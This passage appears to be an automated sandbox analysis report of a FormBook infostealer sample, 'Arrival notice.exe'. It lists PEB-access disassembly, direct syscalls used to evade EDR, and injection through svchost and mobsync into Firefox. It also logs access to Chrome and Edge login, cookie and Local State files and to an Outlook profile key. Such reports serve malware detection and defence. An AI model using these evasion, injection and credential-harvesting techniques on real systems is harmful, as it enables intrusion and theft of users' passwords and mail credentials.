            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366F71F mov eax, dword ptr fs:[00000030h]9_2_0366F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366F71F mov eax, dword ptr fs:[00000030h]9_2_0366F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363D7E0 mov ecx, dword ptr fs:[00000030h]9_2_0363D7E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036527ED mov eax, dword ptr fs:[00000030h]9_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036527ED mov eax, dword ptr fs:[00000030h]9_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036527ED mov eax, dword ptr fs:[00000030h]9_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036317EC mov eax, dword ptr fs:[00000030h]9_2_036317EC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036317EC mov eax, dword ptr fs:[00000030h]9_2_036317EC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036317EC mov eax, dword ptr fs:[00000030h]9_2_036317EC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036347FB mov eax, dword ptr fs:[00000030h]9_2_036347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036347FB mov eax, dword ptr fs:[00000030h]9_2_036347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363C7C0 mov eax, dword ptr fs:[00000030h]9_2_0363C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036357C0 mov eax, dword ptr fs:[00000030h]9_2_036357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036357C0 mov eax, dword ptr fs:[00000030h]9_2_036357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036357C0 mov eax, dword ptr fs:[00000030h]9_2_036357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B97A9 mov eax, dword ptr fs:[00000030h]9_2_036B97A9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036BF7AF mov eax, dword ptr fs:[00000030h]9_2_036BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036BF7AF mov eax, dword ptr fs:[00000030h]9_2_036BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036BF7AF mov eax, dword ptr fs:[00000030h]9_2_036BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036BF7AF mov eax, dword ptr fs:[00000030h]9_2_036BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036BF7AF mov eax, dword ptr fs:[00000030h]9_2_036BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037037B6 mov eax, dword ptr fs:[00000030h]9_2_037037B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036307AF mov eax, dword ptr fs:[00000030h]9_2_036307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365D7B0 mov eax, dword ptr fs:[00000030h]9_2_0365D7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F7BA mov eax, dword ptr fs:[00000030h]9_2_0362F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F7BA mov eax, dword ptr fs:[00000030h]9_2_0362F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F7BA mov eax, dword ptr fs:[00000030h]9_2_0362F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F7BA mov eax, dword ptr fs:[00000030h]9_2_0362F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F7BA mov eax, dword ptr fs:[00000030h]9_2_0362F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F7BA mov eax, dword ptr fs:[00000030h]9_2_0362F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F7BA mov eax, dword ptr fs:[00000030h]9_2_0362F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F7BA mov eax, dword ptr fs:[00000030h]9_2_0362F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F7BA mov eax, dword ptr fs:[00000030h]9_2_0362F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036EF78A mov eax, dword ptr fs:[00000030h]9_2_036EF78A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F866E mov eax, dword ptr fs:[00000030h]9_2_036F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F866E mov eax, dword ptr fs:[00000030h]9_2_036F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366A660 mov eax, dword ptr fs:[00000030h]9_2_0366A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366A660 mov eax, dword ptr fs:[00000030h]9_2_0366A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03669660 mov eax, dword ptr fs:[00000030h]9_2_03669660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03669660 mov eax, dword ptr fs:[00000030h]9_2_03669660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03662674 mov eax, dword ptr fs:[00000030h]9_2_03662674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364C640 mov eax, dword ptr fs:[00000030h]9_2_0364C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364E627 mov eax, dword ptr fs:[00000030h]9_2_0364E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F626 mov eax, dword ptr fs:[00000030h]9_2_0362F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F626 mov eax, dword ptr fs:[00000030h]9_2_0362F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F626 mov eax, dword ptr fs:[00000030h]9_2_0362F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F626 mov eax, dword ptr fs:[00000030h]9_2_0362F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F626 mov eax, dword ptr fs:[00000030h]9_2_0362F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F626 mov eax, dword ptr fs:[00000030h]9_2_0362F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F626 mov eax, dword ptr fs:[00000030h]9_2_0362F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F626 mov eax, dword ptr fs:[00000030h]9_2_0362F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F626 mov eax, dword ptr fs:[00000030h]9_2_0362F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03666620 mov eax, dword ptr fs:[00000030h]9_2_03666620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03705636 mov eax, dword ptr fs:[00000030h]9_2_03705636
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03668620 mov eax, dword ptr fs:[00000030h]9_2_03668620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363262C mov eax, dword ptr fs:[00000030h]9_2_0363262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03661607 mov eax, dword ptr fs:[00000030h]9_2_03661607
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AE609 mov eax, dword ptr fs:[00000030h]9_2_036AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366F603 mov eax, dword ptr fs:[00000030h]9_2_0366F603
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364260B mov eax, dword ptr fs:[00000030h]9_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364260B mov eax, dword ptr fs:[00000030h]9_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364260B mov eax, dword ptr fs:[00000030h]9_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364260B mov eax, dword ptr fs:[00000030h]9_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364260B mov eax, dword ptr fs:[00000030h]9_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364260B mov eax, dword ptr fs:[00000030h]9_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364260B mov eax, dword ptr fs:[00000030h]9_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03633616 mov eax, dword ptr fs:[00000030h]9_2_03633616
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03633616 mov eax, dword ptr fs:[00000030h]9_2_03633616
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672619 mov eax, dword ptr fs:[00000030h]9_2_03672619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C36EE mov eax, dword ptr fs:[00000030h]9_2_036C36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C36EE mov eax, dword ptr fs:[00000030h]9_2_036C36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C36EE mov eax, dword ptr fs:[00000030h]9_2_036C36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C36EE mov eax, dword ptr fs:[00000030h]9_2_036C36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C36EE mov eax, dword ptr fs:[00000030h]9_2_036C36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C36EE mov eax, dword ptr fs:[00000030h]9_2_036C36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365D6E0 mov eax, dword ptr fs:[00000030h]9_2_0365D6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365D6E0 mov eax, dword ptr fs:[00000030h]9_2_0365D6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036636EF mov eax, dword ptr fs:[00000030h]9_2_036636EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AE6F2 mov eax, dword ptr fs:[00000030h]9_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AE6F2 mov eax, dword ptr fs:[00000030h]9_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AE6F2 mov eax, dword ptr fs:[00000030h]9_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AE6F2 mov eax, dword ptr fs:[00000030h]9_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B06F1 mov eax, dword ptr fs:[00000030h]9_2_036B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B06F1 mov eax, dword ptr fs:[00000030h]9_2_036B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036ED6F0 mov eax, dword ptr fs:[00000030h]9_2_036ED6F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]9_2_0366A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366A6C7 mov eax, dword ptr fs:[00000030h]9_2_0366A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363B6C0 mov eax, dword ptr fs:[00000030h]9_2_0363B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363B6C0 mov eax, dword ptr fs:[00000030h]9_2_0363B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363B6C0 mov eax, dword ptr fs:[00000030h]9_2_0363B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363B6C0 mov eax, dword ptr fs:[00000030h]9_2_0363B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363B6C0 mov eax, dword ptr fs:[00000030h]9_2_0363B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363B6C0 mov eax, dword ptr fs:[00000030h]9_2_0363B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F16CC mov eax, dword ptr fs:[00000030h]9_2_036F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F16CC mov eax, dword ptr fs:[00000030h]9_2_036F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F16CC mov eax, dword ptr fs:[00000030h]9_2_036F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F16CC mov eax, dword ptr fs:[00000030h]9_2_036F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036EF6C7 mov eax, dword ptr fs:[00000030h]9_2_036EF6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036616CF mov eax, dword ptr fs:[00000030h]9_2_036616CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366C6A6 mov eax, dword ptr fs:[00000030h]9_2_0366C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362D6AA mov eax, dword ptr fs:[00000030h]9_2_0362D6AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362D6AA mov eax, dword ptr fs:[00000030h]9_2_0362D6AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036276B2 mov eax, dword ptr fs:[00000030h]9_2_036276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036276B2 mov eax, dword ptr fs:[00000030h]9_2_036276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036276B2 mov eax, dword ptr fs:[00000030h]9_2_036276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036666B0 mov eax, dword ptr fs:[00000030h]9_2_036666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B368C mov eax, dword ptr fs:[00000030h]9_2_036B368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B368C mov eax, dword ptr fs:[00000030h]9_2_036B368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B368C mov eax, dword ptr fs:[00000030h]9_2_036B368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B368C mov eax, dword ptr fs:[00000030h]9_2_036B368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03634690 mov eax, dword ptr fs:[00000030h]9_2_03634690

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtOpenKeyEx: Direct from: 0x77672B9CJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtProtectVirtualMemory: Direct from: 0x77672F9CJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtCreateFile: Direct from: 0x77672FECJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtOpenFile: Direct from: 0x77672DCCJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtTerminateThread: Direct from: 0x77672FCCJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtProtectVirtualMemory: Direct from: 0x77667B2EJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtQueryInformationToken: Direct from: 0x77672CACJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtAllocateVirtualMemory: Direct from: 0x77672BECJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtDeviceIoControlFile: Direct from: 0x77672AECJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtQuerySystemInformation: Direct from: 0x776748CCJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtQueryAttributesFile: Direct from: 0x77672E6CJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtSetInformationThread: Direct from: 0x77672B4CJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtOpenSection: Direct from: 0x77672E0CJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtQueryVolumeInformationFile: Direct from: 0x77672F2CJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtSetInformationThread: Direct from: 0x776663F9Jump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtAllocateVirtualMemory: Direct from: 0x776748ECJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtCreateKey: Direct from: 0x77672C6CJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtReadVirtualMemory: Direct from: 0x77672E8CJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtClose: Direct from: 0x77672B6C
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtWriteVirtualMemory: Direct from: 0x7767490CJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtAllocateVirtualMemory: Direct from: 0x77673C9CJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtDelayExecution: Direct from: 0x77672DDCJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtCreateUserProcess: Direct from: 0x7767371CJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtQuerySystemInformation: Direct from: 0x77672DFCJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtQueryInformationProcess: Direct from: 0x77672C26Jump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtResumeThread: Direct from: 0x77672FBCJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtReadFile: Direct from: 0x77672ADCJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtAllocateVirtualMemory: Direct from: 0x77672BFCJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtResumeThread: Direct from: 0x776736ACJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtSetInformationProcess: Direct from: 0x77672C5CJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtMapViewOfSection: Direct from: 0x77672D1CJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtNotifyChangeKey: Direct from: 0x77673C2CJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtCreateMutant: Direct from: 0x776735CCJump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeNtWriteVirtualMemory: Direct from: 0x77672E3CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Arrival notice.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\mobsync.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\mobsync.exeThread register set: target process: 8112Jump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Arrival notice.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: B7D008Jump to behavior
            Source: C:\Users\user\Desktop\Arrival notice.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Arrival notice.exe"Jump to behavior
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeProcess created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: JGgOTaRBeKg.exe, 0000000B.00000000.1640823052.00000000018B0000.00000002.00000001.00040000.00000000.sdmp, JGgOTaRBeKg.exe, 0000000B.00000002.3749774900.00000000018B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: JGgOTaRBeKg.exe, 0000000B.00000000.1640823052.00000000018B0000.00000002.00000001.00040000.00000000.sdmp, JGgOTaRBeKg.exe, 0000000B.00000002.3749774900.00000000018B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: JGgOTaRBeKg.exe, 0000000B.00000000.1640823052.00000000018B0000.00000002.00000001.00040000.00000000.sdmp, JGgOTaRBeKg.exe, 0000000B.00000002.3749774900.00000000018B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Manager
            Source: Arrival notice.exeBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: JGgOTaRBeKg.exe, 0000000B.00000000.1640823052.00000000018B0000.00000002.00000001.00040000.00000000.sdmp, JGgOTaRBeKg.exe, 0000000B.00000002.3749774900.00000000018B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.3747714326.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3758373668.0000000009130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1730283884.0000000008C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3746700176.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1725426506.0000000004390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3750353258.0000000003960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\mobsync.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
